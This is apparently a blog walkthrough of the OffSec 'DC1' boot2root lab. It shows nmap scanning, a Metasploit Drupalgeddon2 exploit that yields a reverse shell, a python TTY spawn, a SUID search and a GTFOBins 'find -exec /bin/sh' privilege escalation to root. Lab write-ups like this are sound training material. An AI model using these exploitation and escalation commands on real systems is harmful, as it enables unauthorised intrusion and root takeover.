DC1 OffSec Walkthrough: Today we are going to take another boot2root challenge known as “DC1” another boot2root challenge in which our goal is to get root access to complete the challenge.
Security Level: Beginner
Penetrating Methodology:
- Network scanning (Nmap)
- Surfing HTTPS service port (80)
- Finding Drupal CMS
- Exploiting Drupalgeddon2 to get a reverse shell
- Finding files with SUID bit set
- Finding the “find” command with SUID bit set
- Getting root shell with “find” command
- Getting final flag
Walkthrough
Let’s start off with scanning our target with nmap.
nmap -sV 192.168.1.104
The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 111(RPC)
We find that port 80 is running http, so we open the IP in our browser.
When we access the web service we find that the server is running Drupal CMS. As the target system is running Drupal CMS, we can check if it is vulnerable to Drupalgeddon2 exploit. We run the exploit using Metasploit on the target machine and successfully able to get a reverse shell.
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.104
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > runAfter getting a reverse shell we spawn a TTY shell using python. Then we find a file with suid permission on the server and find that the “find” command has SUID bit set.
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null
As “find” command has SUID bit set, we can execute the command as “root” user. so let check on gtfobins for SUID code for find great we got code ./find . -exec /bin/sh -p \; -quit now customize this code to run perfectly /usr/bin/find . -exec /bin/sh \; -quit simple run this command and finally we got root acsess.
/usr/bin/find . -exec /bin/sh \; -quit
# cd /root
# cat proof.txtFinnaly this lab solve see you on next lab 😉
Also Read | Potato OffSec Walkthrough
